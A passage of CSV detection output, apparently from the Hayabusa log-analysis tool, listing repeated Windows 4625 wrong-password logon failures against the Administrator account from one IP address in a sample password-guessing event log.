+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: 
